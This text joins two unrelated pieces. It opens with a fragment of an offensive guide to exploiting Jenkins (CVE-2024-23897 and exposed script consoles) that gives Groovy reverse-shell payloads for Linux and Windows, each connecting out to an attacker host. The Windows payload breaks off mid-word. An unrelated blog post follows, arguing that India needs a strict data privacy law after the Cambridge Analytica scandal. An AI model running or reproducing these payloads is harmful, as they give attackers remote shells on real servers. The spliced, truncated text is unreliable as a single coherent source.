Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea
Cambridge Analytica and Information Technology Act of India: Why India needs a Stringent Data Privacy Law?
Last few days, the Cambridge Analytica scandal has been shaking different governments around the world. Also in the news that, CA/FB or its partners was allegedly involved in different elections in India actively.
Let’s see how practical it is to punish CA/FB/or any other organization that violates the data privacy.
Currently, data protection in India is governed by provisions of the Information Technology Act, 2008.So if the Cambridge Analytica scandal has been taken up to the court, the only way it can be dealt with is by using India's Information Technology Act.
Here is what the India’s Union Minister’s response on the Cambridge Analytica Scandal.
“Mr Mark Zuckerberg, you better note the observation of the IT Minister of India. We welcome the FB profile in India, but if any data theft of Indians is done through the collusion of Facebook's system, it shall not be tolerated. We have got stringent powers in the IT Act, and we shall use it, including to summon you in India,"
Actually India lacks Stringent Data Privacy laws like EU-DPD/GDPR.
In Reality, it means nothing because there is no way to summon Zuckerberg, assuming his company is accused of breach of privacy.
Because India doesn’t have any stringent law for data protection. There is nothing in the Indian law that currently stops intermediaries from selling profiles of their clients to whoever is willing to pay. It is known that data available with banks, mobile operators, Internet providers and several other agencies misuse the individual data. Whenever we sign up with some services on Internet (eg; social media, job portals etc), we can expect new mails/calls from some other organizations offering their services. Though they mentions all these in the Terms and Services, how many of us spend time in reading and understanding it. All will simply accept and click forward.
Also, the Ministers anger over privacy seems funny because he had once argued in the Supreme Court that there is nothing called absolute right to privacy. As per Government, the privacy “should be subject to reasonable restrictions.” Adding that the state’s concerns should override privacy rights of individuals.
In the light of recent events such as Aadhaar data misuse and now Cambridge Analytica, It is Obvious that, what India needs is stringent law and fool-proof systems to protect private data.
The entire world is preparing or already established laws for protecting their citizen data and privacy, as the Fastest growing Economy, India should step up with Stringent Data privacy laws.
Note: Many Indian Business persons took loans and left India. The Government was never able to bring them back here, and imagine how they can bring Zuckerberg under a weak IT act? Lol.